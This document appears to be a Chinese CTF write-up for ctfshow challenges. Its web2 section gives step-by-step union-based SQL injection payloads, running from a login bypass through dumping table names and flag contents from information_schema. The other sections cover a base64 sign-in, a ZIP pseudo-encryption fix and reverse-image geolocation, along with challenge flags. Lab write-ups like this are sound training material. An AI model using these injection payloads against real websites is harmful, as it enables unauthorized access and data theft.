WEB板块

web签到题

查看源码

image-20231224220027252

base64解码

image-20231224220039665

1
ctfshow{6d8d8144-c200-4f8e-801c-23b7a1cd2403}

web2

用户名输入

1
' or 1=1 -- a //成功登录

image-20231224221731932

判断字段数

1
2
3
4
' or 1=1 order by 3 -- a //页面正常
' or 1=1 order by 4 -- a //页面不正常

判断有3个字段

判断回显位

构造

1
'or 1=2 union select 1,2,3 -- a //页面出现2,数字2处为回显位

image-20231224222223677

爆库名

构造

1
'or 1=2 union select 1,database(),3 -- a'

image-20231224222241986

爆表名

构造

1
2
3
'or 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1 -- a' //爆出flag表

'or 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1 -- a' //爆出user表

image-20231224222604815

image-20231224222823142

爆字段

构造

1
or 1=2 union select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name='flag' limit 0,1 -- a' //爆出flag字段

image-20231224223104702

看内容

构造

1
'or 1=2 union select 1,flag,3 from flag limit 0,1 -- a'

image-20231224223208961

ctfshow{1a5480d6-f6a8-4787-85fc-a2382f9ac937}

web3

不会,先放着

web316

Misc板块

杂项签到

用010 Editor打开,发现是伪加密,将09改为00

image-20231224225519748

然后就能正常打开了

image-20231224225556417

1
flag{79ddfa61bda03defa7bfd8d702a656e4}

网络迷踪板块

新手上路

附件一张.jpg图片,题目说flag为桥的名字

image-20231224224146833

百度识图找到桥所在的岛的名字

image-20231224224221274

百度搜出桥的名字

image-20231224224245178